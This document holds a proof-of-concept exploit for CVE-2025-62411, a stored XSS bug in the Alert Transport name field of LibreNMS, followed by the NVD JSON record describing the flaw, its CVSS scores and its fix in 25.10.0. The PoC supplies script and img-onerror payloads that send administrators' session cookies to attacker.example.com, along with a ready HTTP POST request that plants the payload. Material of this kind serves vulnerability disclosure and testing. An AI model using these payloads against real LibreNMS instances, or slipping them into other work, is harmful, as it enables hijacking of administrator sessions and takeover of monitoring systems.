CVE-2025-62411

<!-- PoC for CVE-2025-62411: LibreNMS Stored XSS via Alert Transport Name Prerequisites: Attacker must have admin privileges on LibreNMS instance (<= 25.8.0) --> <!-- Step 1: Attacker navigates to Alert Transports management page --> <!-- Step 2: Attacker creates a new Alert Transport with malicious payload as the Transport name --> <!-- Malicious Transport Name payload (to be entered in the "Transport name" input field): --> <script>alert('XSS-CVE-2025-62411');document.location='https://attacker.example.com/steal?c='+document.cookie;</script> <!-- Alternative payloads using event handlers (if <script> tags are partially filtered): --> <img src=x onerror="fetch('https://attacker.example.com/log?data='+btoa(document.cookie))"> <!-- Step 3: When any admin views the Alert Rules page, the malicious Transport name is rendered --> <!-- in the Transports column without HTML encoding, triggering JavaScript execution --> <!-- Simulated HTTP request to create malicious Alert Transport: --> POST /alert-transports/ HTTP/1.1 Host: librenms-target.example.com Content-Type: application/x-www-form-urlencoded Cookie: <admin_session_cookie> _name=<script>alert('XSS-CVE-2025-62411');document.location='https://attacker.example.com/steal?c='+document.cookie;</script>&transport=mail&_token=<csrf_token>

{"cve": {"id": "CVE-2025-62411", "sourceIdentifier": "[email protected]", "published": "2025-10-16T18:15:39.747", "lastModified": "2025-10-23T12:31:17.607", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LibreNMS is a community-based GPL-licensed network monitoring system. LibreNMS <= 25.8.0 contains a Stored Cross-Site Scripting (XSS) vulnerability in the Alert Transports management functionality. When an administrator creates a new Alert Transport, the value of the Transport name field is stored and later rendered in the Transports column of the Alert Rules page without proper input validation or output encoding. This leads to arbitrary JavaScript execution in the admin’s browser. This vulnerability is fixed in 25.10.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:librenms:librenms:*:*:*:*:*:*:*:*", "versionEndExcluding": "25.10.0", "matchCriteriaId": "ABE380D2-71A2-4342-B88C-D3F54C4E350A"}]}]}], "references": [{"url": "https://github.com/librenms/librenms/commit/706a77085f4d5964f7de9444208ef707e1f79450", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/librenms/librenms/security/advisories/GHSA-frc6-pwgr-c28w", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/librenms/librenms/security/advisories/GHSA-frc6-pwgr-c28w", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}